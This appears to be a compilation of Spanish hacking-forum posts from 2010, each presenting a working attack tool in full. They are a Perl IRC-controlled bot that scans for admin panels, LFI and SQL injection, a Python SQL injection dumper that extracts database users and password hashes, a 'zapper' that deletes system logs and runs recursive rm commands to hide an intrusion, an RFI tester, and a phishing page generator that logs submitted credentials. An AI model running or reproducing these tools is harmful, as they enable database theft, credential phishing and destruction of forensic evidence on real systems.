tml','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/');

my $nave = LWP::UserAgent->new();
$nave->timeout(13);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");


print "\n[+] tERR0R b0T (c) dODDy HacKMaN 2010\n\n";

my $servidor = "127.0.0.1"; #Servidor IRC
my $canal = "#locos"; #Canal IRC del servidor especificado
my $nick = "Lepuke-Slave"; # Apodo del bot
my $port = "6667"; # Puerto del servidor IRC

print "[+] Starting the bot\n";

my $soquete = new IO::Socket::INET( PeerAddr =>$servidor,
PeerPort => $port,
Proto => 'tcp' );

if (!$soquete) {
print "\n[-] No se puedo conectar en $servidor $port\n";
exit 1;
}


print $soquete "NICK $nick\r\n";
print $soquete "USER $nick 1 1 1 1\r\n";
print $soquete "JOIN $canal\r\n";

print "[+] Online\n\n";

while ( my $log = <$soquete> ) {
chomp($log);

if ($log =~ /^PING(.*)$/i){
print $soquete "PONG $1\r\n";
}

if($log =~ m/:!panel (.*)$/g) {
scan($1);
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}

if($log =~ m/:!sqli (.*)$/g) {
print $soquete "PRIVMSG $canal : [+] SQL Scan Starting\r\n";
scan2($1);
}

if($log =~ m/:!fuzzdns (.*)$/g) {
scan1($1);
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}

if($log =~ m/:!lfi (.*)$/g) {
lfi($1);
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}



if($log =~ m/:!base64 (.*) (.*)$/g) {
use MIME::Base64;
my ($opcion,$aa) = ($1,$2);
if ($opcion eq "encode") {
print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Encode : ".encode_base64($aa)."\r\n";
}
elsif ($opcion eq "decode") {
print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Text : ".decode_base64($aa)."\r\n";
}
else {
print $soquete "PRIVMSG $canal : ??\r\n";
}
}

if($log =~ m/:!ascii (.*) (.*)$/) {
my ($opcion,$aa) = ($1,$2);
chomp $aa;
if ($opcion eq "encode") {
print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Encode : ".ascii($aa)."\r\n";
}
elsif ($opcion eq "decode") {
print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Text : ".ascii_de($aa)."\r\n";
}
else {
print $soquete "PRIVMSG $canal : ???\r\n";
}
}

if($log =~ m/:!hex (.*) (.*)$/) {
my ($opcion,$aa) = ($1,$2);
chomp $aa;
if ($opcion eq "encode") {
print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Encode : ".encode($aa)."\r\n";
}
elsif ($opcion eq "decode") {
print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Text : ".decode($aa)."\r\n";
}
else {
print $soquete "PRIVMSG $canal : ????\r\n";
}
}
}

sub lfi {
print $soquete "PRIVMSG $canal : [+] Target confirmed : $_[0]"."\r\n";
print $soquete "PRIVMSG $canal : [+] Status : [scanning]"."\r\n";
$code = toma($_[0]);
if ($code=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
print $soquete "PRIVMSG $canal : [+] Vulnerable !"."\r\n";
print $soquete "PRIVMSG $canal : [*] Full path discloure detected : $1"."\r\n";
print $soquete "PRIVMSG $canal : [+] Status : [fuzzing files]"."\r\n";
for my $file(@buscar3) {
$code1 = toma($_[0].$file);
unless ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
$ok = 1;
print $soquete "PRIVMSG $canal : [File Found] : ".$_[0].$file."\r\n";
}
}
unless($ok == 1) {
print $soquete "PRIVMSG $canal : [-] Dont found any file"."\r\n";
}
} else {
print $soquete "PRIVMSG $canal : [-] Page not vulnerable to LFI"."\r\n";
}
}


sub scan1 {
print $soquete "PRIVMSG $canal : [*] Searching DNS to ".$_[0]."\r\n";
for my $path(@dns) {
$code = tomax("http://".$path.".".$_[0]);
if ($code->is_success) {
print $soquete "PRIVMSG $canal : http://".$path.".".$_[0]."\r\n";
}
}
}

sub scan {
print $soquete "PRIVMSG $canal [*] Searching panels to ".$_[0]."\r\n";
for my $path(@panels) {
$code = tomax($_[0]."/".$path);
if ($code->is_success) {
print "\a";
$ct = 1;
print $soquete "PRIVMSG $canal [Link] : ".$_[0]."/".$path."\r\n";
}
}
if ($ct ne 1) {
print $soquete "PRIVMSG $canal [-] Not found any path\r\n";
}
}



sub scan2 {

my $rows  = "0";
my $asc;
my $page = $_[0];

($pass1,$pass2) = &bypass($ARGV[1]);
$inyection = $page."-1".$pass1."order".$pass1."by"."9999999999".$pass2;
$code = toma($inyection);
if($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
my $path = $1;
chomp $path;
$alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
$total = "1";
for my $rows(2..52) {
$asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
$total.= ",".$rows;
$injection = $page."-1".$pass1."union".$pass1."select".$pass1.$alert.$asc;
$test = toma($injection);
if ($test=~/RATSXPDOWN/) {
@number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
print $soquete "PRIVMSG $canal : [Page] : $page\r\n";
print $soquete "PRIVMSG $canal : [Limit] : The site has $rows columns\r\n";
print $soquete "PRIVMSG $canal : [Data] : The number @number print data\r\n";
if ($test=~/RATSXPDOWN(\d+)/) {
if ($path) {
print $soquete "PRIVMSG $canal : [Full Path Discloure] : $path\r\n";
}
$total=~s/@number[0]/hackman/;
print $soquete "PRIVMSG $canal : [+] Injection SQL : ".$page."-1".$pass1."union".$pass1."select".$pass1.$total."\r\n";
&details($page."-1".$pass1."union".$pass1."select".$pass1.$total,$_[1]);
last;
}
}
}
}
}

sub details {
my $page = $_[0];
($pass1,$pass2) = &bypass($ARGV[1]);
if ($page=~/(.*)hackman(.*)/ig) {
my $start = $1; my $end = $2;
$test1 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2);
$test2 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2);
$test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
if ($test2=~/ERTOR854/ig) {
print $soquete "PRIVMSG $canal : [+] Posibilidad de ver usuarios con mysql.user\r\n";
}
if ($test1=~/ERTOR854/ig) {
print $soquete "PRIVMSG $canal : [+] Se pueden ver todo con information_schema\r\n";
}
if ($test3=~/ERTOR854/ig) {
print $soquete "PRIVMSG $canal : [+] load_file permite ver los archivos\r\n";
}
$code = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))".$end.$pass2);
if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
print $soquete "PRIVMSG $canal : [!] DB Version : $1\r\n";
print $soquete "PRIVMSG $canal : [!] DB Name : $2\r\n";
print $soquete "PRIVMSG $canal : [!] user_name : $3\r\n";
} else {
print $soquete "PRIVMSG $canal : [-] Not found any data\r\n";
}
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}
}
}

sub bypass {
if ($_[0] eq "/*") { return ("/**/","/*"); }
elsif ($_[0] eq "%20") { return ("%20","%00"); }
else {return ("+","--");}}


sub ascii {
return join ',',unpack "U*",$_[0];
}

sub ascii_de {
$_[0] = join q[], map { chr } split q[,],$_[0];
return $_[0];
}


sub encode {
my $string = $_[0];
$hex = '0x';
for (split //,$string) {
$hex .= sprintf "%x", ord;
}return $hex;}

sub decode {
$_[0] =~ s/^0x//;
$encode = join q[], map { chr hex } $_[0] =~ /../g;
return $encode;
}

sub toma {
return $nave->request (GET $_[0])->content;
}

sub tomax {
return $nave->request (GET $_[0]);
}

#The End




Bueno este es un simple scanner en python que hice para SQLI

Con las sig opciones :

• Verifica vulnerabilidad
  
• Busca columnas
  
• Busca el numero milagroso y saca info sobre la DB
  
• Saca tablas y columnas de de la DB actual o otra externa
  
• Dumpear usuarios
  
• Guarda todo en un log con el nombre de la web en la carpeta /logs
  
  
  
  Código (python) [Seleccionar] Expandir
  
#!usr/bin/python
#SQL Scanner 0.3 (C) Doddy Hackman 2010

import os,sys,urllib2,re,binascii
from urlparse import urlparse

def clean():
if sys.platform=="win32":
 os.system("cls")
else:
 os.system("clear")

def savefile(name,text):
file = open(name,"a")
file.write("\n"+text+"\n")
file.close()

def gethost(test):
return urlparse(test).netloc

def header() :
print "\n--== SQL Scanner ==--\n"

def copyright() :
print "\n\n(C) Doddy Hackman 2010\n"
sys.exit(1)

def show() :
print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web) :
nave = urllib2.Request(web)
nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
op = urllib2.build_opener()
return op.open(nave).read()

def bypass(bypass):
if bypass == "--":
 return("+","--")
elif bypass == "/*":
 return("/**/","/*")
else:
 return("+","--")


def dumper(web,passx,table,col1,col2):

pass1,pass2 = bypass(passx)
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web)
code1 = toma(web1+pass1+"from"+pass1+table+pass2)
print "\n\n[+] Searching values\n\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
 numbers = re.findall("K0BRA(.*?)K0BRA",code1)
 numbers = numbers[0]
 print "[+] Values Found : ",numbers,"\n"
 for counter in range(0,int(numbers)):
  code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  if (re.findall("K0BRA(.*?)K0BRA",code2)):
   c1 = re.findall("K0BRA(.*?)K0BRA",code2)
   c1 = c1[0]

   c2 = re.findall("K0BRA1(.*?)K0BRA1",code2)
   c2 = c2[0]
   print "["+col1+"] : "+c1
   print "["+col2+"] : "+c2+"\n"
   savefile("logs/"+gethost(web)+".txt","["+col1+"] : "+c1)
   savefile("logs/"+gethost(web)+".txt","["+col2+"] : "+c2+"\n")
else:
 print "[-] Not Found\n"



def mysqluser(web,passx):
pass1,pass2 = bypass(passx)
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web)
code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
print "\n\n[+] Searching mysql.user\n\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
 numbers = re.findall("K0BRA(.*?)K0BRA",code1)
 numbers = numbers[0]
 print "[+] mysql.user : ON"
 savefile("logs/"+gethost(web)+".txt","[+] mysql.user : ON")
 savefile("logs/"+gethost(web)+".txt","[+] Users Found : "+numbers+"\n")
 print "[+] Users Found : ",numbers,"\n"
 for counter in range(0,int(numbers)):
  code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  if (re.findall("K0BRA(.*?)K0BRA",code2)):
   host = re.findall("K0BRA(.*?)K0BRA",code2)
   host = host[0]

   user = re.findall("K0BRA1(.*?)K0BRA1",code2)
   user = user[0]

   passw = re.findall("K0BRA2(.*?)K0BRA2",code2)
   passw = passw[0]
   savefile("logs/"+gethost(web)+".txt","[Host] : "+host)
   savefile("logs/"+gethost(web)+".txt","[User] : "+user)
   savefile("logs/"+gethost(web)+".txt","[Pass] : "+passw+"\n")
   print "[Host] : "+host
   print "[User] : "+user
   print "[Pass] : "+passw+"\n"    
else:
 print "[-] Not Found\n"



def showcolumnsdb(web,db,table,passx):
db = "0x"+str(binascii.hexlify(db))
table = "0x"+str(binascii.hexlify(table))
pass1,pass2 = bypass(passx)
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2)
print "\n\n[+] Searching columns in DB\n\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
 numbers = re.findall("K0BRA(.*?)K0BRA",code1)
 numbers = numbers[0]
 savefile("logs/"+gethost(web)+".txt","[DB] : "+db)
 savefile("logs/"+gethost(web)+".txt","[DB] : "+table)
 print "[+] information_schema : ON"
 print "[+] Columns Found : ",numbers,"\n"
 for counter in range(0,int(numbers)):
  code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  if (re.findall("K0BRA(.*?)K0BRA",code2)):
   column = re.findall("K0BRA(.*?)K0BRA",code2)
   column = column[0]
   savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column)
   print "[Column Found] : "+column

else:
 print "[-] Not Found\n"


def showtablesdb(web,db,passx):
db = "0x"+str(binascii.hexlify(db))
pass1,pass2 = bypass(passx)
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2)
print "\n\n[+] Searching tables in DB\n\n"
savefile("logs/"+gethost(web)+".txt","[DB] : "+db)
if (re.findall("K0BRA(.*?)K0BRA",code1)):
 numbers = re.findall("K0BRA(.*?)K0BRA",code1)
 numbers = numbers[0]
 print "[+] information_schema : ON"
 print "[+] Tables Found : ",numbers,"\n"
 for counter in range(0,int(numbers)):
  code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
 
  if (re.findall("K0BRA(.*?)K0BRA",code2)):
   table = re.findall("K0BRA(.*?)K0BRA",code2)
   table = table[0]
   print "[Table Found] : "+table
   savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
else:
 print "[-] Not Found\n"



def showtables(web,passx):
pass1,pass2 = bypass(passx)
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
print "\n\n[+] Searching tables\n\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
 numbers = re.findall("K0BRA(.*?)K0BRA",code1)
 numbers = numbers[0]
 print "[+] information_schema : ON"
 print "[+] Tables Found : ",numbers,"\n"
 for counter in range(17,int(numbers)):
  code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  if (re.findall("K0BRA(.*?)K0BRA",code2)):
   table = re.findall("K0BRA(.*?)K0BRA",code2)
   table = table[0]
   print "[Table Found] : "+table
   savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
else:
 print "[-] Not Found\n"



def showcolumns(tabla,web,passx):
pass1,pass2 = bypass(passx)
tabla = "0x"+str(binascii.hexlify(tabla))
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2)
print "\n\n[+] Searching tables\n\n"
savefile("logs/"+gethost(web)+".txt","[Table Found] : "+tabla)
if (re.findall("K0BRA(.*?)K0BRA",code1)):
 numbers = re.findall("K0BRA(.*?)K0BRA",code1)
 numbers = numbers[0]
 print "[+] information_schema : ON"
 print "[+] Columns Found : ",numbers,"\n"
 for counter in range(0,int(numbers)):
  code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  if (re.findall("K0BRA(.*?)K0BRA",code2)):
   column = re.findall("K0BRA(.*?)K0BRA",code2)
   column = column[0]
   print "[Column Found] : "+column
   savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column)
else:
 print "[-] Not Found\n"




def showdbs(web,passx):
pass1,pass2 = bypass(passx)
web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web)
code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
print "\n\n[+] Searching DBS\n\n"
if (re.findall("K0BRA(.*?)K0BRA",code1)):
 numbers = re.findall("K0BRA(.*?)K0BRA",code1)
 numbers = numbers[0]
 print "[+] information_schema : ON"
 print "[+] DBS Found : ",numbers,"\n"
 for counter in range(0,int(numbers)):
  code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  if (re.findall("K0BRA(.*?)K0BRA",code2)):
   db = re.findall("K0BRA(.*?)K0BRA",code2)
   db = db[0]
   print "[DB Found] : "+db
   savefile("logs/"+gethost(web)+".txt","[DB Found] : "+db)
else:
 print "[-] Not Found\n"




def menu(page,bypass):
clean()
header()
print "\n[+] Target : ",page,"\n"
print "\n[information_schema]\n\n"
print "1 - Show tables\n"
print "2 - Show columns of the a table\n"
print "3 - Show databases\n"
print "4 - Show tables from the a DB\n"
print "5 - Show columns from the a table of the DB\n"
print "\n[mysql.user]\n\n"
print "6 - Show users\n"
print "\n[Others]\n\n"
print "7 - Show details\n"
print "8 - Dump data\n"
print "9 - Show log\n"
print "10 - Change target\n"
print "11 - Exit\n\n"
try:
 op = input("[Option] : ")
 if op == 1:
  showtables(page,bypass)
  raw_input()    
  menu(page,bypass)
 elif op == 2:
  table = raw_input("\n\n[Table] : ")
  showcolumns(table,page,bypass)
  raw_input()
  menu(page,bypass)
 elif op == 3:
  showdbs(page,bypass)
  raw_input()
  menu(page,bypass)
 elif op == 4:
  db = raw_input("\n\n[DB] : ")
  showtablesdb(page,db,bypass)
  raw_input()
  menu(page,bypass)
 elif op == 5:
  db = raw_input("\n\n[DB] : ")
  table = raw_input("\n\n[Table] : ")
  showcolumnsdb(page,db,table,bypass)
  raw_input()
  menu(page,bypass)
 elif op == 6:
  mysqluser(page,bypass)
  raw_input()
  menu(page,bypass)
 elif op == 7:
  more(page,bypass)
  raw_input()
  menu(page,bypass)
 elif op == 8:
  table = raw_input("\n\n[Table] : ")
  col1 = raw_input("\n\n[Column 1] : ")
  col2 = raw_input("\n\n[Column 2] : ")
  dumper(page,bypass,table,col1,col2)
  raw_input()
  menu(page,bypass)
 elif op == 9:
  os.system("start logs/"+gethost(page)+".txt")
  menu(page,bypass)
 elif op == 10:
  sta()
except:
 menu(page,bypass)
if op == 11:
 copyright()
 

def more(web,passx):
pass1,pass2 = bypass(passx)
print "\n[+] Searching more data\n"
web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web)
code0 = toma(web1+pass2)
if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
 datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
 datar = re.split("K0BRA",datax[0])
 print "[+] Username :",datar[1]
 print "[+] Database :",datar[2]
 print "[+] Version :",datar[3],"\n"
 savefile("logs/"+gethost(web)+".txt","[+] Username : "+datar[1])
 savefile("logs/"+gethost(web)+".txt","[+] Database : "+datar[2])
 savefile("logs/"+gethost(web)+".txt","[+] Version : "+datar[3]+"\n")
code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
if (re.findall("K0BRA",code1)):
  print "[+] mysql.user : on"
  savefile("logs/"+gethost(web)+".txt","[+] mysql.user : on")
code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
if (re.findall("K0BRA",code2)):
  print "[+] information_schema.tables : on"
  savefile("logs/"+gethost(web)+".txt","[+] information_schema.tables : on")

def findlength(web,passx):
pass1,pass2 = bypass(passx)
print "\n[+] Finding columns length"
number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))"
for te in range(2,30):
 number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))"
 code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2)
 if (re.findall("K0BRA(.*?)K0BRA",code)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code)
  print "[+] Column length :",te
  print "[+] Numbers",numbers,"print data"
  sql = ""
  tex = te + 1
  for sqlix in range(2,tex):
   sql = str(sql)+","+str(sqlix)
   sqli  = str(1)+sql
  sqla = re.sub(numbers[0],"hackman",sqli)
  savefile("logs/"+gethost(web)+".txt","[Target] : "+web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla)
  menu(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx)

print "[-] Length dont found\n"
 
   
def scan(web,passx):
pass1,pass2 = bypass(passx)
print "\n\n[+] Testing vulnerability"
code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2)
if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
 print "[+] SQLI Detected"
 findlength(web,passx)
else:
 print "[-] Not Vulnerable"
 copyright()


def sta():

clean()
header()

web = raw_input("\n\n[Page] : ")
bypasx = raw_input("\n\n[Bypass] : ")
scan(web,bypasx)

sta()

#The End
  

Hola a todos.

Acabo de hacer un simple zapper en python , tan solo lo cargan en el sistema web atacado y comienza
a borrar huellas.
Eso si , no me habia dado cuenta de que facil usar python xDD

Código (python) [Seleccionar] Expandir


#!usr/bin/python
#Zapper (C) Doddy Hackman

import os

paths = ["/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp","/var/log/secure","/root/.ksh_history", "/root/.bash_history","/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp","/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm",
"/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs","/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog",
"/var/log/messages/", "/var/log/proftpd/xferlog.legacy","/var/log/proftpd.xferlog", "/var/log/proftpd.access_log","/var/log/httpd/error_log", "/var/log/httpsd/ssl_log","/var/log/httpsd/ssl.access_log", "/etc/mail/access","/var/log/qmail", "/var/log/smtpd", "/var/log/samba",
"/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority","/var/log/poplog", "/var/log/news.all", "/var/log/spooler","/var/log/news", "/var/log/news/news", "/var/log/news/news.all",
"/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice","/var/log/news/suck.err", "/var/log/news/suck.notice","/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks","/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log","/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs","/var/log/auth"]

comandos  = ['find / -name *.bash_history -exec rm -rf {} \;' , 'find / -name *.bash_logout -exec rm -rf {} \;','find / -name log* -exec rm -rf {} \;','find / -name  *.log -exec rm -rf {} \;','unset HISTFILE','unset SAVEHIST']

print "\n[+] Starting the zapper"

for path in paths :
try :
 os.delete(path)
except :
 pass

for cmd in comandos :
try:
 os.system(cmd)
except:
 pass

print "[+] All logs are erased\n"

#The End ?



Hola a todos.

Acabo de hacer un simple verificador de vulnerabilidad RFI

Código (python) [Seleccionar] Expandir


#!usr/bin/python
#RFI Tester (C) Doddy Hackman

import os,sys,urllib2,re

def header() :
print "\n--== RFI Tester ==--\n"

def copyright() :
print "\n\n(C) Doddy Hackman 2010\n"
exit(1)

def show() :
print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web) :
return urllib2.urlopen(web).read()

def test(web):
try:
 print "\n[+] Testing vulnerability RFI in",web
 code = toma(web+"http://www.supertangas.com")
 if(re.findall("Los mejores TANGAS de la red",code,re.I)):
  print "[+] RFI Detected"
 else:
  print "[-] RFI Not Found"
except:
 pass

header()

if len(sys.argv) != 2 :
show()

else :
test(sys.argv[1])

copyright()


#The End


Ejemplo de uso

Código [Seleccionar] Expandir


python rfi.py http://127.0.0.1/rfi.php?index=


Código [Seleccionar] Expandir


C:\Users\DoddyH\Desktop\Arsenal X parte 2>rfi.py http://127.0.0.1/rfi.php?index=

--== RFI Tester ==--


[+] Testing vulnerability RFI in http://127.0.0.1/rfi.php?index=
[+] RFI Detected

(C) Doddy Hackman 2010



Hola a todos

Acabo de terminar esta tool en python para generar los fakes o phising (si es que asi se escribe)
No me dedico mucho a esa parte del hacking , pero hice esta cosa rara porque no
tenia nada que hacer xDD.

Código (python) [Seleccionar] Expandir

#!usr/bin/python
#Phising Gen (C) Doddy Hackman

import urllib2,sys,os


def savefile(filename,text):
file = open(filename,"w")
file.write(text)
   

def header() :
print "\n\n--== Phising Gen ==--\n"

def copyright() :
print "\n\n(C) Doddy Hackman 2010\n"
exit(1)

def show() :
print "\n[*] Sintax : ",sys.argv[0]," <web> <filename>\n"

def toma(web) :
return urllib2.urlopen(web).read()


def gen(web,new):
try:
 print "\n[+] Working in the phishing"
 code = toma(web)
 text ='<?php $file = fopen("dump.txt", "a");foreach($_POST as $uno => $dos) {fwrite($file, $uno."=".$dos."\r\n");}foreach($_GET as $tres => $cuatro) {fwrite($file, $tres."=".$cuatro."\r\n");}fclose($file);?>'
 print "[+] The fake was save in",new
 savefile(new,code+"\n\n"+text)
except:
 pass

header()

if len(sys.argv) != 3 :
show()

else :
gen(sys.argv[1],sys.argv[2])

copyright()

#The End




Ejemplo de uso

Código [Seleccionar] Expandir


C:/Users/DoddyH/Desktop/Arsenal X parte 2>phising.py http://127.0.0.1/login.php
yeah.php



--== Phising Gen ==--


[+] Working in the phishing
[+] The fake was save in yeah.php


(C) Doddy Hackman 2010



Hola a todos.

Acabo de terminar una tool para testear una vulnerabilidad LFI , si la pagina
es vulnerable entonces el script automaticamente intenta brutear archivos.

Código (python) [Seleccionar] Expandir


#!usr/bin/perl
#LFI T00l (C) Doddy Hackman

import os,sys,urllib2,re

